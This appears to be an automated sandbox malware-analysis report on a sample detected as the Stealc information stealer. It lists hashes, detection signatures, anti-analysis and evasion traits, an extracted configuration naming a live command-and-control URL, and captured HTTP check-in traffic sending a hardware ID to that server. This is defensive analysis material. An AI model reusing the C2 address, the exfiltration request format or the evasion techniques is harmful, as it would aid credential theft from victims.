Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562847
MD5: 9c3907317b9374403b30537d305a9608
SHA1: cc0a6c6a0902debac4da3bad9b3eded80a503a6e
SHA256: 8f0d52b51a86a71a362bd071e2ee687c7921e0c4f32a0e96fd0ba4c9a3f568e0
Tags: exe, user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2804 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9C3907317B9374403B30537D305A9608)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.2044462951.0000000004E20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2804 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2804 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T06:46:09.099061+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP

              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php/Ct | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpel | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/Vt | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpDt | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpql | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/1t | Avira URL Cloud: Label: malware
Source: file.exe.2804.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe | Virustotal: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00704C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_007060D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007240B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00716960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00716960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0070EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00716B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00716B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00709B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00709B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00707750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00713910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00713910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00711269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00711269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00711250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00711250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0071E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00714B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00714B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00714B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00714B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0071CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00712390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00712390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0070DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0070DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0071DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0071D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007016A0

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 185.215.113.206Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 46 46 35 31 44 33 36 37 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="hwid"C6FF51D367C058492808------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build"mars------DHIEBAAKJDHIECAAFHCA--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00704C50
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 185.215.113.206Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 46 46 35 31 44 33 36 37 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="hwid"C6FF51D367C058492808------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build"mars------DHIEBAAKJDHIECAAFHCA--
Source: file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/1t
Source: file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/5
Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/Vt
Source: file.exe, 00000000.00000002.2085798410.0000000001106000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Ct
Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpDt
Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpel
Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpql
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00709770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC28B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B99896
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A60EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007248B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B161
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC42DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABA3AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB1BE9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABF312
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB6D9B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABBD2A
